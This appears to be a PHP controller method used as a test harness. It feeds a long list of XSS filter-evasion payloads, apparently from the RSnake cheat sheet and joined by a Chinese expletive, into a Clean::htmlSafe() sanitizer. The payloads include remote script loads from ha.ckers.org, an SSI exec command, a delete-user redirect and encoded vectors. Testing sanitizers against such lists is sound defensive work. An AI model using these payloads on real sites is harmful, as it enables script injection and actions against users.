/** * 显示登录页(默认Action) */ function doDefault() { $data = <<<EOF //--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> 你大爷 '';!--"<XSS>=&{()} 你大爷 <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> 你大爷 <IMG SRC="javascript:alert('XSS');"> 你大爷 <IMG SRC=javascript:alert('XSS')> 你大爷 <IMG SRC=JaVaScRiPt:alert('XSS')> 你大爷 <IMG SRC=javascript:alert("XSS")> 你大爷 <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> 你大爷 <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> 你大爷 <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> 你大爷 <IMG SRC=javascript:alert('XSS')> 你大爷 <IMG SRC=javascript:alert('XSS')> 你大爷 <IMG SRC=javascript:alert('XSS')> 你大爷 <IMG SRC="jav\tascript:alert('XSS');"> 你大爷 <IMG SRC="jav	ascript:alert('XSS');"> 你大爷 <IMG SRC="jav
ascript:alert('XSS');"> 你大爷 <IMG SRC="jav
ascript:alert('XSS');"> 你大爷 <IMG SRC = " j a v a s c r i p t : a l e r t ( ' X S S ' ) " > 你大爷 perl -e 'print "<IMG SRC=javascript:alert(\\"XSS\\")>";' > out 你大爷 perl -e 'print "<SCRIPT>alert(\\"XSS\\")</SCRIPT>";' > out 你大爷 <IMG SRC="  javascript:alert('XSS');"> 你大爷 <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> 你大爷 <BODY onload!#\$%&()*~+-_.,:;?@[/|\\]^`=alert("XSS")> 你大爷 <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> 你大爷 <<SCRIPT>alert("XSS");//<</SCRIPT> 你大爷 <SCRIPT SRC=http://ha.ckers.org/xss.js?<B> 你大爷 <SCRIPT SRC=//ha.ckers.org/.j> 你大爷 <IMG SRC="javascript:alert('XSS')" 你大爷 <iframe src=http://ha.ckers.org/scriptlet.html < 你大爷 <SCRIPT>a=/XSS/ alert(a.source)</SCRIPT> 你大爷 \\";alert('XSS');// 你大爷 </TITLE><SCRIPT>alert("XSS");</SCRIPT> 你大爷 <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> 你大爷 <BODY BACKGROUND="javascript:alert('XSS')"> 你大爷 <BODY ONLOAD=alert('XSS')> 你大爷 <IMG DYNSRC="javascript:alert('XSS')"> 你大爷 <IMG LOWSRC="javascript:alert('XSS')"> 你大爷 <BGSOUND SRC="javascript:alert('XSS');"> 你大爷 <BR SIZE="&{alert('XSS')}"> 你大爷 <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER> 你大爷 <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> 你大爷 <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> 你大爷 <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> 你大爷 <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> 你大爷 <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> 你大爷 <XSS STYLE="behavior: url(xss.htc);"> 你大爷 <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS 你大爷 <IMG SRC='vbscript:msgbox("XSS")'> 你大爷 <IMG SRC="mocha:[code]"> 你大爷 <IMG SRC="livescript:[code]"> 你大爷 ¼script¾alert(¢XSS¢)¼/script¾ 你大爷 <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> 你大爷 <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> 你大爷 <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> 你大爷 <IFRAME SRC="javascript:alert('XSS');"></IFRAME> 你大爷 <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> 你大爷 <TABLE BACKGROUND="javascript:alert('XSS')"> 你大爷 <TABLE><TD BACKGROUND="javascript:alert('XSS')"> 你大爷 <DIV STYLE="background-image: url(javascript:alert('XSS'))"> 你大爷 <DIV STYLE="background-image:52C8'a161332904a1c5248.10278.1053379'9"> 你大爷 <DIV STYLE="background-image: url(javascript:alert('XSS'))"> 你大爷 <DIV STYLE="width: expression(alert('XSS'));"> 你大爷 <STYLE>@im\\port'\\ja\vasc ipt:alert("XSS")';</STYLE> 你大爷 <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> 你大爷 <XSS STYLE="xss:expression(alert('XSS'))"> 你大爷 exp/*<A STYLE='no\\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'> 你大爷 <STYLE TYPE="text/javascript">alert('XSS');</STYLE> 你大爷 <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> 你大爷 <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> 你大爷 <!--[if gte IE 4]> <SCRIPT>alert('XSS');</SCRIPT> <![endif]--> 你大爷 <BASE HREF="javascript:alert('XSS');//"> 你大爷 <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> 你大爷 <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> 你大爷 <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> 你大爷 <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> 你大爷 a="get"; b="URL(\\""; c="javascript:"; d="alert('XSS');\\")"; eval(a+b+c+d); 你大爷 <HTML xmlns:xss> <?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"> <xss:xss>XSS</xss:xss> </HTML> 你大爷 <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]> </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> 你大爷 <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML> <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> 你大爷 <XML SRC="xsstest.xml" ID=I></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> 你大爷 <HTML><BODY> <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> <?import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>"> </BODY></HTML> 你大爷 <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> 你大爷 <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> 你大爷 <? echo('<SCR)'; echo('IPT>alert("XSS")</SCRIPT>'); ?> 你大爷 <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> 你大爷 Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser 你大爷 <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> 你大爷 <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- 你大爷 <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> 你大爷 <SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> 你大爷 <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> 你大爷 <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> 你大爷 <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> 你大爷 <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> 你大爷 <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> 你大爷 <A HREF="http://66.102.7.147/">XSS</A> 你大爷 <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> 你大爷 <A HREF="http://1113982867/">XSS</A> 你大爷 <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> 你大爷 <A HREF="http://0102.0146.0007.00000223/">XSS</A> 你大爷 <A HREF="h tt\tp://6	6.000146.0x7.147/">XSS</A> 你大爷 <A HREF="//www.google.com/">XSS</A> 你大爷 <A HREF="//google">XSS</A> 你大爷 <A HREF="http://ha.ckers.org@google">XSS</A> 你大爷 <A HREF="http://google:ha.ckers.org">XSS</A> 你大爷 <A HREF="http://google.com/">XSS</A> 你大爷 <A HREF="http://www.google.com./">XSS</A> 你大爷 <A HREF="javascript:document.location='http://www.google.com/'">XSS</A> 你大爷 <A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A> 你大爷 < %3C < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < \\u003c \\u003C 你大爷 EOF; //echo $data; echo Clean::htmlSafe($data);